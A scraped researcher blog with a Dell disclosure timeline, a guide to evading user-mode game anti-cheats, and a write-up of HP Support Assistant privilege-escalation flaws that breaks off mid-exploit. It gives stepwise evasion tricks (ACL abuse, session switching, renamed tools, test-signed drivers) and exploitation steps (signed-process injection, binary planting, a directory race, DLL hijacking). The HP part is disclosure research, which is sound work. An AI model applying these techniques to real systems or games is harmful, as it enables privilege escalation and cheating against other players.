04/25/2019 - Initial write up and proof of concept sent to Dell.

04/26/2019 - Initial response from Dell.

05/08/2019 - Dell has confirmed the vulnerability.

05/27/2019 - Dell has a fix ready to be released within 2 weeks.

06/19/2019 - Vulnerability disclosed by Dell as an advisory.

06/28/2019 - Vulnerability disclosed at RECON Montreal 2019.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

2 December 2019 at 15:05
Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

The market for cheating in video games has grown year after year, incentivizing game developers to implement stronger anti-cheat solutions. A significant amount of game companies have taken a rather questionable route, implementing more and more invasive anti-cheat solutions in a desperate attempt to combat cheaters, still ending up with a game that has a large cheating community. This choice is understandable. A significant amount of cheaters have now moved into the kernel realm, challenging anti-cheat developers to now design mitigations that combat an attacker who shares the same privilege level. However, not all game companies have followed this invasive path, some opting to use anti-cheats that reside in the user-mode realm.

I've seen a significant amount of cheaters approach user-mode anti-cheats the same way they would approach a kernel anti-cheat, often unknowingly making the assumption that the anti-cheat knows everything, and thus approaching them in an ineffective manner. In this article, we'll look at how to leverage our escalated privileges, as a cheater, to attack the insecure design these unprivileged solutions are built on.

Introduction

When attacking anything technical, one of the first steps I take is to try and put myself in the mind of a defender. For example, when I reverse engineer software for security vulnerabilities, putting myself in the shoes of the developer allows me to better understand the design of the application. Understanding the design behind the logic is critical for vulnerability research, as this often reveals points of weakness that deserve a dedicated look over. When it comes to anti-cheats, the first step I believe any attacker should take is understanding the scope of the application.

What I mean by scope is posing the question, What can the anti-cheat "see" on the machine? This question is incredibly important in researching these anti-cheats, because you may find blind spots on a purely design level. For user-mode anti-cheats, because they live in an unprivileged context, they're unable to access much and must be creative while developing detection vectors. Let's take a look at what access unprivileged anti-cheats truly have and how we can mitigate against it.

Investigating Detection Vectors

The Filesystem

Most access in Windows is restricted by the use of security descriptors, which dictate who has permissions on an object and how to audit the usage of the object.

For example, if a file or directory has the Users group in its security descriptor, i.e

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

That means pretty much any user on the machine can can access this file or directory. When anti-cheats are in an unprivileged context, they're strictly limited in what they can access on the filesystem, because they're unable to ignore these security descriptors. As a cheater, this provides the unique opportunity to abuse these security descriptors against them to stay under their radars.

Filesystem access is a large part of these anti-cheats because if you run a program with elevated privileges, the unprivileged anti-cheat cannot open a handle to that process. This is due to the difference between their elevation levels, but not being able to open the process is far from being game over. The first method anti-cheats can use to "access" the process is by just opening the process's file. More often than not, the security descriptor for a significant amount of files will be accessible from an unprivileged context.

For example, typically anything in the "Program Files" directory in the C: drive has a security descriptor that permits for READ and EXECUTE access to the Users group or allows the Administrators group FULL CONTROL on the directory. Since the Users group is permitted access unprivileged processes are able to access files in these directories. This is relevant for when you launch a cheating program such as Cheat Engine, one detection vector they have is just reading in the file of the process and checking for cheating related signatures.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

NT Object Manager Leaks

Filesystem access is not the only trick user-mode anti-cheats have. The next relevant access these anti-cheats have is a significant amount of query access to the current session. In Windows, sessions are what separates active connections to the machine. For example, you being logged into the machine is a session and someone connected to another user via a Remote Desktop will have their own session too. Unprivileged anti-cheats can see almost everything going on in the session that the anti-cheat runs in. This significant access allows anti-cheats to develop strong detection vectors for a lot of different cheats.

Let's see what unprivileged processes can really see. One neat way to view what's going on in your session is by the use of the WinObj Sysinternals utility. WinObj allows you to see a plethora of information about the machine without any special privileges.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

WinObj can be run with or without Administrator privileges, however, I suggest using Administrator privileges during investigation because sometimes you cannot "list" one of the directories above, but you can "list" sub-folders. For example, even for your own session, you cannot "list" the directory containing the BaseNamedObjects, but you can access it directly using the full path \Session\[session #]\BaseNamedObjects.

User-mode anti-cheat developers hunt for information leaks in these directories because the information leaks can be significantly subtle. For example, a significant amount of tools in kernel expose a device for IOCTL communication. Cheat Engine's kernel driver "DBVM" is an example of a more well-known issue.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

Since by default Everyone can access the Device directory, they can simply check if any devices have a blacklisted name. More subtle leaks happen as well. For example, IDA Pro uses a mutex with a unique name, making it simple to detect when the current session has IDA Pro running.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

Window Enumeration

A classic detection vector for all kinds of anti-cheats is the anti-cheat enumerating windows for certain characteristics. Maybe it's a transparent window that's always the top window, or maybe it's a window with a naughty name. Windows provide for a unique heuristic detection mechanism given that cheats often have some sort of GUI component.

To investigate these leaks, I used Process Hacker's "Windows" tab that shows what windows a process has associated with it. For example, coming back to the Cheat Engine example, there are plenty of windows anti-cheats can look for.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

User-mode anti-cheats can enumerate windows via the use of EnumWindows API (or the API that EnumWindows calls) which allow them to enumerate every window in the current session. There can be many things anti-cheats look for in windows, whether that be the class, text, the process associated with the window, etc.

NtQuerySystemInformation

The next most lethal tool in the arsenal of these anti-cheats is NtQuerySystemInformation. This API allows even unprivileged processes to query a significant amount of information about what's going on in your computer.

There's too much data provided to cover all of it, but let's see some of the highlights of NtQuerySystemInformation.

  1. NtQuerySystemInformation with the class SystemProcessInformation provides a SYSTEM_PROCESS_INFORMATION structure, giving a variety amount of info about every process.
  2. NtQuerySystemInformation with the class SystemModuleInformation provides a RTL_PROCESS_MODULE_INFORMATION structure, giving a variety amount of info about every loaded driver.
  3. NtQuerySystemInformation with the class SystemHandleInformation provides a SYSTEM_HANDLE_INFORMATION structure, giving a list of every open handle in the system.
  4. NtQuerySystemInformation with the class SystemKernelDebuggerInformation provides a SYSTEM_KERNEL_DEBUGGER_INFORMATION structure, which tells the caller whether or not a kernel debugger is loaded (i.e WinDbg KD).
  5. NtQuerySystemInformation with the class SystemHypervisorInformation provides a SYSTEM_HYPERVISOR_QUERY_INFORMATION structure, indicating whether or not a hypervisor is present.
  6. NtQuerySystemInformation with the class SystemCodeIntegrityPolicyInformation provides a SYSTEM_CODEINTEGRITY_INFORMATION structure, indicating whether or not various code integrity options are enabled (i.e Test Signing, Debug Mode, etc).

This is only a small subset of what NtQuerySystemInformation exposes and it's important to remember these data sources while designing a secure cheat.

Circumventing Detection Vectors

Time for my favorite part. What's it worth if I just list all the possible ways for user-mode anti-cheats to detect you, without providing any solutions? In this section, we'll look over the detection vectors we mentioned above and see different ways to mitigate against them. First, let's summarize what we found.

  1. User-mode anti-cheats can use the filesystem to get a wide variety of access, primarily to access processes that are inaccessible via conventional methods (i.e OpenProcess).
  2. User-mode anti-cheats can use a variety of objects Windows exposes to get an insight into what is running in the current session and machine. Often times there may be hard to track information leaks that anti-cheats can use to their advantage, primarily because unprivileged processes have a lot of query power.
  3. User-mode anti-cheats can enumerate the windows of the current session to detect and flag windows that match the attributes of blacklisted applications.
  4. User-mode anti-cheats can utilize the enormous amount of data the NtQuerySystemInformation API provides to peer into what's going on in the system.

Circumventing Filesystem Detection Vectors

To restate the investigation section regarding filesystems, we found that user-mode anti-cheats could utilize the filesystem to get access they once did not have before. How can an attacker evade filesystem based detection routines? By abusing security descriptors.

Security descriptors are what truly dictates who has access to an object, and in the filesystem this becomes especially important in regards to who can read a file. If the user-mode anti-cheat does not have permission to read an object based on its security descriptors, then they cannot read that file. What I mean is, if you run a process as Administrator, preventing the anti-cheat from opening the process and then you remove access to the file, how can the anti-cheat read the file? This method of abusing security descriptors would allow an attacker to evade detections that involve opening processes through the filesystem.

You may feel wary when thinking about restricting unprivileged access to your process, but there are many subtle ways to achieve the same result. Instead of directly setting the security descriptor of the file or folder, why not find existing folders that have restricted security descriptors?

For example, the directory C:\Windows\ModemLogs already prevents unprivileged access.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

The directory by default disallows unprivileged applications from accessing it, requiring at least Administrator privileges to access it. What if you put your naughty binary in here?

Another trick to evade information leaks in places such as the Device directory or BaseNamedObjects directory is to abuse their security descriptors to block access to the anti-cheat. I strongly advise that you utilize a new sandbox account, however, you can set the permissions of directories such as the Device directory to deny access to certain security principles.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

Using security descriptors, we can block access to these directories to prevent anti-cheats from traversing them. All we need to do in the example above is run the game as this new user and they will not have access to the Device directory. Since security descriptors control a significant amount of access in Windows, it's important to understand how we can leverage them to cut off anti-cheats from crucial data sources.

The solution of abusing security descriptors isn't perfect, but the point I'm trying to make is that there is a lot of room for becoming undetected. Given that most anti-cheats have to deal with a mountain full of compatibility issues, it's unlikely that most abuse would be detected.

Circumventing Object Detection and Window Detection

I decided to include both Object and Window detection in this section because the circumvention can overlap. Starting with Object detection, especially when dealing with tools that you didn't create, understanding the information leaks a program has is the key to evading detection.

The example brought up in investigation was the Cheat Engine driver's device name and IDA's mutex. If you're using someone elses software, it's very important that you look for information leaks, primarily because they may not be designed with preventing information leaks in mind.

For example, I was able to make TitanHide undetected by several user-mode anti-cheat platforms by:

  1. Utilizing the previous filesystem trick to prevent access to the driver file.
  2. Changing the pipe name of TitanHide.
  3. Changing the log output of TitanHide.

These steps are simple and not difficult to conceptualize. Read through the source code, understand detection surface, and harden these surfaces. It can be as simple as changing a few names to become undetected.

When creating your own software that has the goal of combating user-mode anti-cheats, information leaks should be a key step when designing the application. Understanding the internals of Windows can help a significant amount, because you can better understand different types of leaks that can occur.

Transitioning to a generic circumvention for both object detection and window detection is through the abuse of multiple sessions. The mentioned EnumWindows API can only enumerate windows in the current session. Unprivileged processes from one session can't access another session's objects. How do you use multiple sessions? There are many ways, but here's the trick I used to bypass a significant amount of user-mode anti-cheats.

  1. I created a new user account.
  2. I set the security descriptor of my naughty tools to be inaccessible by an unprivileged context.
  3. I ran any of my naughty tools by switching users and running it as that user.

Those three simple steps are what allowed me to use even the most common utilities such as Cheat Engine against some of the top user-mode anti-cheats. Unprivileged processes cannot access the processes of another user and they cannot enumerate any objects (including windows) of another session. By switching users, we're entering another session, significantly cutting off the visibility anti-cheats have.

A mentor of mine, Alex Ionescu, pointed out a different approach to preventing an unprivileged process from accessing windows in the current session. He suggested that you can put the game process into a job and then set the JOB_OBJECT_UILIMIT_HANDLES UI restriction. This would restrict any processes in the job from accessing "USER" handles of processes outside of the job, meaning that the user-mode anti-cheat could not access windows in the same session. The drawback of this method is that the anti-cheat could detect this restriction and could choose to crash/flag you. The safest method is generally not touching the process itself and instead evading detection using generic methods (i.e switching sessions).

Circumventing NtQuerySystemInformation

Unlike the previous circumvention methods, evading NtQuerySystemInformation is not as easy. In my opinion, the safest way to evade detection routines that utilize NtQuerySystemInformation is to look at the different information classes that may impact you and ensure you do not have any unique information leaks through those classes.

Although NtQuerySystemInformation does give a significant amount of access, it's important to note that the data returned is often not detailed enough to be a significant threat to cheaters.

If you would like to restrict user-mode anti-cheat access to the API, there is a solution. NtQuerySystemInformation respects the integrity level of the calling process and significantly limits access to Restricted Callers. These callers are primarily those who have a token below the medium integrity level. This sandboxing can allow us to limit a significant amount of access to the user-mode anti-cheat, but with the cost of a potential detection vector. The anti-cheat could choose to crash if its ran under a medium integrity level which would stop this trick.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

When at a low integrity level, processes:

  1. Cannot query handles.
  2. Cannot query kernel modules.
  3. Can only query other processes with equal or lower integrity levels.
  4. Can still query if a kernel debugger is present.

When testing with Process Hacker, I found some games with user-mode anti-cheats already crashed, perhaps because they received an ACCESS_DENIED error for one of their detection routines. An important reminder as with the previous job limit circumvention method. Since this trick does directly touch the process, it is possible anti-cheats can simply crash or flag you for setting their integrity level. Although I would strongly suggest you develop your cheats in a manner that does not allow for detection via NtQuerySystemInformation, this sandboxing trick is a way of suppressing some of the leaked data.

Test Signing

If I haven't yet convinced you that user-mode anti-cheats are easy to circumvent, it gets better. On all of the user-mode anti-cheats I tested test signing was permitted, allowing for essentially any driver to be loaded, including ones you create.

If we go back to our scope, drivers really only have a few detection vectors:

  1. User-mode anti-cheats can utilize NtQuerySystemInformation to get basic information on kernel modules. Specifically, the anti-cheat can obtain the kernel base address, the module size, the path of the driver, and a few other properties. You can view exactly what's returned in the definition of RTL_PROCESS_MODULE_INFORMATION. This can be circumvented by basic security practices such as ensuring the data returned in RTL_PROCESS_MODULE_INFORMATION is unique or by modifying the anti-cheat's integrity level.
  2. User-mode anti-cheats can query the filesystem to obtain the driver contents. This can be circumvented by changing the security descriptor of the driver.
  3. User-mode anti-cheats can hunt for information leaks by your driver (such as using a blacklisted device name) to identify it. This can be circumvented by designing your driver to be secure by design (unlike many of these anti-cheats).

Circumventing the above checks will result in an undetected kernel driver. The information leak prevention can be difficult, however, if you know what you're doing, you should understand what APIs may leak certain information accessible by these anti-cheats.

I hope I have taught you something new about combating user-mode anti-cheats and demystified their capabilities. User-mode anti-cheats come with the benefit of having a less invasive product that doesn't infringe on the privacy of players, but at the same time are incredibly weak and limited. They can appear scary at first, given their usual advantage in detecting "internal" cheaters, but we must realize how weak their position truly is. Unprivileged processes are as the name suggests unprivileged. Stop wasting time treating these products as any sort of challenge, use the operating system's security controls to your advantage. User-mode anti-cheats have already lost, quit acting like they're any stronger than they really are.

Several Critical Vulnerabilities on most HP machines running Windows

3 April 2020 at 12:31
Several Critical Vulnerabilities on most HP machines running Windows

I always have considered bloatware a unique attack surface. Instead of the vulnerability being introduced by the operating system, it is introduced by the manufacturer that you bought your machine from. More tech-savvy folk might take the initiative and remove the annoying software that came with their machine, but will an average consumer? Pre-installed bloatware is the most interesting, because it provides a new attack surface impacting a significant number of users who leave the software on their machines.

For the past year, I've been researching bloatware created by popular computer manufacturers such as Dell and Lenovo. Some of the vulnerabilities I have published include the Remote Code Execution and the Local Privilege Escalation vulnerability I found in Dell's own pre-installed bloatware. More often then not, I have found that this class of software has little-to-no security oversight, leading to poor code quality and a significant amount of security issues.

In this blog post, we'll be looking at HP Support Assistant which is "pre-installed on HP computers sold after October 2012, running Windows 7, Windows 8, or Windows 10 operating systems". We'll be walking through several vulnerabilities taking a close look at discovering and exploiting them.

General Discovery

Before being able to understand how each vulnerability works, we need to understand how HP Support Assistant works on a conceptual level. This section will document the background knowledge needed to understand every vulnerability in this report except for the Remote Code Execution vulnerability.

Opening a few of the binaries in dnSpy revealed that they were "packed" by SmartAssembly. This is an ineffective attempt at security through obscurity as de4dot quickly deobfuscated the binaries.

On start, HP Support Assistant will begin hosting a "service interface" which exposes over 250 different functions to the client. This contract interface is exposed by a WCF Net Named Pipe for access on the local system. In order for a client to connect to the interface, the client creates a connection to the interface by connecting to the pipe net.pipe://localhost/HPSupportSolutionsFramework/HPSA.

This is not the only pipe created. Before a client can call on any of the useful methods in the contract interface, it must be "validated". The client does this by calling on the interface method StartClientSession with a random string as the first argument. The service will take this random string and start two new pipes for that client.

The first pipe is called \\.\pipe\Send_HPSA_[random string] and the second is called \\.\pipe\Receive_HPSA_[random string]. As the names imply, HP uses two different pipes for sending and receiving messages.

After creating the pipes, the client will send the string "Validate" to the service. When the service receives any message over the pipe except "close", it will automatically validate the client – regardless of the message contents ("abcd" will still cause validation).

The service starts by obtaining the process ID of the process it is communicating with using GetNamedPipeClientProcessId on the pipe handle. The service then grabs the full image file name of the process for verification.

The first piece of verification is to ensure that the "main module" property of the C# Process object equals the image name returned by GetProcessImageFileName.

The second verification checks that the process file is not only signed, but the subject of its certificate contains hewlett-packard, hewlett packard, or o=hp inc.

Several Critical Vulnerabilities on most HP machines running Windows

The next verification checks the process image file name for the following:

  1. The process path is "rooted" (not a relative path).
  2. The path does not start with \.
  3. The path does not contain ...
  4. The path does not contain .\.
  5. The path is not a reparse or junction point.
Several Critical Vulnerabilities on most HP machines running Windows

The last piece of client verification is checking that each parent process passes the previous verification steps AND starts with:

  1. C:\Program Files[ (x86)]
  2. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\
  3. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Solutions\
  4. or C:\Windows (excluding C:\Windows\Temp)

If you pass all of these checks, then your "client session" is added to a list of valid clients. A 4-byte integer is generated as a "client ID" which is returned to the client. The client can obtain the required token for calling protected methods by calling the interface method GetClientToken and passing the client ID it received earlier.

One extra check done is on the process file name. If the process file name is either:

  1. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\HPSF.exe
  2. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\ProductConfig.exe
  3. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\HPSFViewer.exe

Then your token is added to a list of "trusted tokens". Using this token, the client can now call certain protected methods.

Before we head into the next section, there is another key design concept important to understanding almost all of the vulnerabilities. In most of the "service methods", the service often accepts several parameters about an "action" to take via a structure called the ActionItemBase. This structure has several pre-defined properties for a variety of methods that is set by the client. Anytime you see a reference to an "action item base property", understand that this property is under the complete control of an attacker.

In the following sections, we’ll be looking at several vulnerabilities found and the individual discovery/exploitation process for each one.

General Exploitation

Before getting into specific exploits, being able to call protected service methods is our number one priority. Most functions in the WCF Service are "protected", which means we will need to be able to call these functions to maximize the potential attack surface. Let’s take a look at some of the mitigations discussed above and how we can bypass them.

A real issue for HP is that the product is insecure by design. There are mitigations which I think serve a purpose, such as the integrity checks mentioned in the previous section, but HP is really fighting a battle they’ve already lost. This is because core components, such as the HP Web Product Detection rely on access to the service and run in an unprivileged context. The fact is, the current way the HP Service is designed, the service must be able to receive messages from unprivileged processes. There will always be a way to talk to the service as long as unprivileged processes are able to talk to the service.

The first choice I made is adding the HP.SupportFramework.ServiceManager.dll binary as a reference to my C# proof-of-concept payload because rewriting the entire client portion of the service would be a significant waste of time. There were no real checks in the binary itself and even if there were, it wouldn't have matter because it was a client-side DLL I controlled. The important checks are on the "server" or service side which handles incoming client connections.

The first important check to bypass is the second one where the service checks that our binary is signed by an HP certificate. This is simple to bypass because we can just fake being an HP binary. There are many ways to do this (i.e Process Doppleganging), but the route I took was starting a signed HP binary suspended and then injecting my malicious C# DLL. This gave me the context of being from an HP Program because I started the signed binary at its real path (in Program Files x86, etc).

To bypass the checks on the parent processes of the connecting client process, I opened a PROCESS_CREATE_PROCESS handle to the Windows Explorer process and used the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute to spoof the parent process.

Feel free to look at the other mitigations, this method bypasses all of them maximizing the attack surface of the service.

Local Privilege Escalation Vulnerabilities

Discovery: Local Privilege Escalation #1 to #3

Before getting into exploitation, we need to review context required to understand each vulnerability.

Let’s start with the protected service method named InstallSoftPaq. I don’t really know what "SoftPaq" stands for, maybe software package? Regardless, this method is used to install HP updates and software.

Several Critical Vulnerabilities on most HP machines running Windows

The method takes three arguments. First is an ActionItemBase object which specifies several details about what to install. Second is an integer which specifies the timeout for the installer that is going to be launched. Third is a Boolean indicating whether or not to install directly, it has little to no purpose because the service method uses the ActionItemBase to decide if it's installing directly.

The method begins by checking whether or not the action item base ExecutableName property is empty. If it is, the executable name will be resolved by concatenating both the action item base SPName property and .exe.

If the action item base property SilentInstallString is not empty, it will take a different route for executing the installer. This method is assumed to be the "silent install" method whereas the other one is a direct installer.

Silent Install

Several Critical Vulnerabilities on most HP machines running Windows

When installing silently, the service will first check if an Extract.exe exists in C:\Windows\TEMP. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP's installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.

Several Critical Vulnerabilities on most HP machines running Windows

The method will then check to make sure that C:\Windows\TEMP + the action item base property ExecutableName exists as a file. If the file does exist, the method will ensure that the file is signed by HP (see General Discovery for a detailed description of the verification).

Several Critical Vulnerabilities on most HP machines running Windows

If the SilentInstallString property of the action item base contains the SPName property + .exe, the current directory for the new process will be the temporary directory. Otherwise, the method will set the current directory for the new process to C:\swsetup\ + the ExecutableName property.

Furthermore, if the latter, the service will start the previously copied Extract.exe binary and attempt to extract the download into current directory + the ExecutableName property after stripping .exe from the string. If the extraction folder already exists, it is deleted before execution. When the Extract.exe binary has finished executing, the sub-method will return true. If the extraction method returns false, typically due to an exception that occurred, the download is stopped in its tracks.

Several Critical Vulnerabilities on most HP machines running Windows

After determining the working directory and extracting the download if necessary, the method splits the SilentInstallString property into an array using a double quote as the delimiter.

If the silent install split array has a length less than 2, the installation is stopped in its tracks with an error indicating that the silent install string is invalid. Otherwise, the method will check if the second element (index 1) of the split array contains .exe, .msi, or .cmd. If it does not, the installation is stopped.

The method will then take the second element and concatenate it with the previously resolved current directory + the executable name with .exe stripped + \ + the second element. For example, if the second element was cat.exe and the executable name property was cats, the resolved path would be the current directory + \cats\cat.exe. If this resolved path does not exist, the installation stops.

If you passed the previous checks and the resolved path exists, the binary pointed to by the resolved path is executed. The arguments passed to the binary is the silent install string, however, the resolved path is removed from it. The installation timeout (minutes) is dictated by the second argument passed to InstallSoftPaq.

After the binary has finished executing or been terminated for passing the timeout period, the method returns the status of the execution and ends.

Direct Install

When no silent install string is provided, a method named StartInstallSoftpaqsDirectly is executed.

The method will then check to make sure that the result of the Path.Combine method with C:\Windows\TEMP and the action item base property ExecutableName as arguments exists as a file. If the file does not exist, the method stops and returns with a failure. If the file does exist, the method will ensure that the file is signed by HP (see General Discovery for a detailed description of the verification).

The method will then create a new scheduled task for the current time. The task is set to be executed by the Administrators group and if an Administrator is logged in, the specified program is executed immediately.

Exploitation: Local Privilege Escalation #1 to #3

Local Privilege Escalation #1

The first simple vulnerability causing Local Privilege Escalation is in the silent install route of the exposed service method named InstallSoftPaq. Quoting the discovery portion of this section,

When installing silently, the service will first check if an Extract.exe exists in C:\Windows\TEMP. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP's installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.

This is where the bug lies. Unprivileged users can write to C:\Windows\TEMP, but cannot enumerate the directory (thanks Matt Graeber!). This allows an unprivileged attacker to write a malicious binary named Extract.exe to C:\Windows\TEMP, appending enough NULL bytes to match the size of the actual Extract.exe in HP's installation directory.

Here are the requirements of the attacker-supplied action item base:

  1. The action item base property SilentInstallString must be defined to something other than an empty string.
  2. The temporary path (C:\Windows\TEMP) + the action item base property ExecutableName must be a real file.
  3. This file must also be signed by HP.
  4. The action item base property SilentInstallString must not contain the value of the property SPName + .exe.

If these requirements are passed, when the method attempts to start the extractor, it will start our malicious binary as NT AUTHORITY\SYSTEM achieving Local Privilege Escalation.

Local Privilege Escalation #2

The second Local Privilege Escalation vulnerability again lies in the silent install route of the exposed service method named InstallSoftPaq. Let’s review what requirements we need to pass in order to have the method start our malicious binary.

  1. The action item base property SilentInstallString must be defined to something other than an empty string.
  2. The temporary path (C:\Windows\TEMP) + the action item base property ExecutableName must be a real file.
  3. This file must also be signed by HP.
  4. If the SPName property + .exe is in the SilentInstallString property, the current directory is C:\Windows\TEMP. Otherwise, the current directory is C:\swsetup\ + the ExecutableName property with .exe stripped. The resulting path does not need to exist.
  5. The action item base property SilentInstallString must have at least one double quote.
  6. The action item base property SilentInstallString must have a valid executable name after the first double quote (i.e a valid value could be something"cat.exe). This executable name is the "binary name".
  7. The binary name must contain .exe or .msi.
  8. The file at current directory + \ + the binary name must exist.

If all of these requirements are passed, the method will execute the binary at current directory + \ + binary name.

The eye-catching part about these requirements is that we can cause the "current directory", where the binary gets executed, to be in a directory path that can be created with low privileges. Any user is able to create folders in the C:\ directory, therefore, we can create the path C:\swsetup and have the current directory be that.

We need to make sure not to forget that the executable name has .exe stripped from it and this directory is created within C:\swsetup. For example, if we pass the executable name as dog.exe, we can have the current directory be C:\swsetup\dog. The only requirement if we go this route is that the same executable name exists in C:\Windows\TEMP. Since unprivileged users can write into the C:\Windows\TEMP directory, we simply can write a dog.exe into the directory and pass the first few checks. The best part is, the binary in the temp directory does not need to be the same binary in the C:\swsetup\dog directory. This means we can place a signed HP binary in the temp directory and a malicious binary in our swsetup directory.

A side-effect of having swsetup as our current directory is that the method will first try to "extract" the file in question. In the process of extracting the file, the method first checks if the swsetup directory exists. If it does, it deletes it. This is perfect for us, because we can easily tell when the function is almost at executing allowing us to quickly copy the malicious binary after re-creating the directory.

After extraction is attempted and after we place our malicious binary, the method will grab the filename to execute by grabbing the string after the first double quote character in the SilentInstallString parameter. This means if we set the parameter to be a"BadBinary.exe, the complete path for execution will be the current directory + BadBinary.exe. Since our current directory is C:\swsetup\dog, the complete path to the malicious binary becomes C:\swsetup\dog\BadBinary.exe. The only check on the file specified after the double quote is that it exists, there are no signature checks.

Once the final path is determined, the method starts the binary. For us, this means our malicious binary is executed.
To review the example above:

  1. We place a signed HP binary named dog.exe in C:\Windows\TEMP.
  2. We create the directory chain C:\swsetup\dog.
  3. We pass in an action item base with the ExecutableName property set to dog.exe, the SPName property set to anything but BadBinary, and the SilentInstallString property set to a"BadBinary.exe.
  4. We monitor the C:\swsetup\dog directory until it is deleted.
  5. Once we detect that the dog folder is deleted, we immediately recreate it and copy in our BadBinary.exe.
  6. Our BadBinary.exe gets executed with SYSTEM permissions.

Local Privilege Escalation #3

The next Local Privilege Escalation vulnerability is accessible by both the previous protected method InstallSoftpaq and InstallSoftpaqDirectly. This exploit lies in the previously mentioned direct install method.

This method starts off similarly to its silent install counterpart by concatenating C:\Windows\TEMP and the action item base ExecutableName property. Again similarly, the method will verify that the path specified is a binary signed by HP. The mildly interesting difference here is that instead of doing an unsafe concatenation operation by just adding the two strings using the + operator, the method uses Path.Combine, the safe way to concatenate path strings.

Path.Combine is significantly safer than just adding two path strings because it checks for invalid characters and will throw an exception if one is detected, halting most path manipulation attacks.

Several Critical Vulnerabilities on most HP machines running Windows

What this means for us as an attacker is that our ExecutableName property cannot escape the C:\Windows\TEMP directory, because / is one of the blacklisted characters.

This isn’t a problem, because unprivileged processes CAN write directly to C:\Windows\TEMP. This means we can place a binary to run right into the TEMP directory and have this method eventually execute it. Here’s the small issue with that, the HP Certificate check.

How do we get past that? We can place a legitimate HP binary into the temporary directory for execution, but we need to somehow hijack its context. In the beginning of this report, we outlined how we can enter the context of a signed HP binary by injecting into it, this isn’t exactly possible here because the service is the one creating the process. What we CAN do is some simple DLL Hijacking.

DLL Hijacking means we place a dynamically loaded library that is imported by the binary into the current directory of the signed binary. One of the first locations Windows searches when loading a dynamically linked library is the current directory. When the signed binary attempts to load that library, it will load our malicious DLL and give us the ability to execute in its context.

I picked at random from the abundant supply of signed HP binaries. For this attack, I went with HPWPD.exe which is HP’s "Web Products Detection" binary. A simple way to find a candidate DLL to hijack is by finding the libraries that are missing. How do we find "missing" dynamically loaded libraries? Procmon to the rescue!

Using three simple filters and then running the binary, we’re able to easily determine a missing library.

Several Critical Vulnerabilities on most HP machines running Windows
Several Critical Vulnerabilities on most HP machines running Windows

Now we have a few candidates here. C:\VM is the directory where the binary resides on my test virtual machine. Since the first path is not in the current directory, we can disregard that. From there on, we can see plenty of options. Each one of those CreateFile operations usually mean that the binary was attempting to load a dynamically linked library and was checking the current directory for it. For attacking purposes, I went with RichEd20.dll just because it's the first one I saw.

To perform this Local Privilege Escalation attack, all we have to do is write a malicious DLL, name it RichEd20.dll, and stick it with the binary in C:\Windows\TEMP. Once we call the direct install method passing the HPWPD.exe binary as the ExecutableName property, the method will start it as the SYSTEM user and then the binary will load our malicious DLL escalating our privileges.

Discovery: Local Privilege Escalation #4

The next protected service method to look at is DownloadSoftPaq.

To start with, this method takes in an action item base, a String parameter called MD5URL, and a Boolean indicating whether or not this is a manual installation. As an attacker, we control all three of these parameters.

Several Critical Vulnerabilities on most HP machines running Windows

If we pass in true for the parameter isManualInstall AND the action item base property UrlResultUI is not empty, we’ll use this as the download URL. Otherwise, we’ll use the action item base property UrlResult as the download URL. If the download URL does not start with http, the method will force the download URL to be http://.

Several Critical Vulnerabilities on most HP machines running Windows

This is an interesting check. The method will make sure that the Host of the specified download URL ends with either .hp.com OR .hpicorp.net. If this Boolean is false, the download will not continue.

Another check is making a HEAD request to the download URL and ensuring the response header Content-Length is greater than 0. If an invalid content length header is returned, the download won’t continue.

The location of the download is the combination of C:\Windows\TEMP and the action item base ExecutableName property. The method does not use safe path concatenation and instead uses raw string concatenation. After verifying that there is internet connection, the content length of the download URL is greater than 0, and the URL is "valid", the download is initiated.

If the action item base ActionType property is equal to "PrinterDriver", the method makes sure the downloaded file’s MD5 hash equals that specified in the CheckSum property or the one obtained from HP’s CDN server.

Several Critical Vulnerabilities on most HP machines running Windows
Several Critical Vulnerabilities on most HP machines running Windows

After the file has completed downloading, the final verification step is done. The VerifyDownloadSignature method will check if the downloaded file is signed. If the file is not signed and the shouldDelete argument is true, the method will delete the downloaded file and return that the download failed.

Exploitation: Local Privilege Escalation #4

Let’s say I wanted to abuse DownloadSoftPaq to download my file to anywhere in the system, how could I do this?

Let’s take things one at a time, starting with the first challenge, the download URL. Now the only real check done on this URL is making sure the host of the URL http://[this part]/something ENDS with .hp.com or .hpicorp.net. As seen in the screenshot of this check above, the method takes the safe approach of using C#’s URI class and grabbing the host from there instead of trying to parse it out itself. This means unless we can find a "zero day" in C#’s parsing of host names, we’ll need to approach the problem a different way.

Okay, so our download URL really does need to end with an HP domain. DNS Hijacking could be an option, but since we’re going after a Local Privilege Escalation bug, that would be pretty lame. How about this… C# automatically follows redirects, so what if we found an open redirect bug in any of the million HP websites? Time to use one of my "tricks" of getting a web bug primitive.

Sometimes I need a basic exploit primitive like an open redirect vulnerability or a cross site scripting vulnerability but I’m not really in the mood to pentest, what can I do? Let me introduce you to a best friend for an attacker, "OpenBugBounty"! OpenBugBounty is a site where random researchers can submit web bugs about any website. OpenBugBounty will take these reports and attempt to email several security emails at the vulnerable domain to report the issue. After 90 days from the date of submission, these reports are made public.

So I need an open redirect primitive, how can I use OpenBugBounty to find one? Google it!

Several Critical Vulnerabilities on most HP machines running Windows

Nice, we got a few options, let’s look at the first one.

Several Critical Vulnerabilities on most HP machines running Windows

